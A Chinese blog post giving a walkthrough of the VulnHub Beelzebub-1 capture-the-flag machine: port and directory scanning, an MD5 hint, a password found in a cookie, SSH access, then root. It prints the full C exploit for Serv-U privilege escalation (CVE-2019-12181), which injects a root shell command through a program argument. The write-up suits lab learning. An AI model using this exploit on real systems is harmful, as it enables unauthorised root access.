vulnhub靶机-BEELZEBUB-1

参考

https://resources.infosecinstitute.com/topic/beelzebub-1-vulnhub-ctf-walkthrough/

 

工具

https://www.exploit-db.com/exploits/47009 (CVE-2019-12181)

 

学习知识

 

基本程序

1.确认靶机ip

2.确认开放端口

3.寻找可用端口,扫描目录,找到可用漏洞。

漏洞:

4.尝试漏洞,后渗透

 

步骤

kali ip

微信截图_20220813155016

1.确认靶机ip(192.168.47.138)

微信截图_20220813155124

2.确认开放端口

微信截图_20220813155249

3.寻找可用的端口

开启22端口,进行ssh连接

开启80端口,查看

微信截图_20220813155420

没什么可用的东西

进行目录扫描

dirb http://192/168.47.138

 

发现含有idnex.html, index.php, phpmyadmin,进行查看

微信截图_20220813155755

在index.php源码出发现提示

My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5

对beelzebub进行MD5加密

echo -n "beelzebub" | md5sum
d18e1e22becbd915b45e0e655429d487  -

phpmyadmin需登录

微信截图_20220813155910

尝试登录,发现登陆错误

将此MD5值作为目录传入,如下图

微信截图_20220813160435

在上面的截图中,我们可以看到我们收到了一个页面无法连接的错误信息。这意味着该名称确实存在一个目录。让我们在目录上使用 Dirb 来识别隐藏的文件和文件夹以进一步进行。Dirb 命令和结果可以在下面的屏幕截图中看到。

微信截图_20220813160514

查看此目录

微信截图_20220813160547

在Talk To VALAK中发现一些程序正在运行

微信截图_20220813160627

随便输入值,进行bp抓包

微信截图_20220813160747

在cookie处发现密码为 M4k3Ad3a1

进行ssh连接

微信截图_20220813160901

查看权限,发现不能使用sudo,但在所有文件发现以.conf结尾的文件,谷歌搜索文件名,发下存在本地提权漏洞。

微信截图_20220813160940

微信截图_20220813161112

exp

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{      
   char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
   int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
   // if execv is successful, we won't reach here
   printf("ret val: %d errno: %d\n", ret_val, errno);
   return errno;
}

为C文件,进行创建,发现vim用不了。

1.使用nano编译器

 

2.使用

cat >> 1.c

将代码写进去,ctrl+x结束编写

然后对代码进行编译,运行

gcc 1.c

chmod 777 a.out

./a.out

微信截图_20220813162048

得到root权限

在Desktop目录下找到user权限flag,在/root目录下找到root权限flag

 

posted @ 2022-08-13 16:24  LoYoHo00  阅读(47)  评论(0编辑  收藏  举报
levels of contents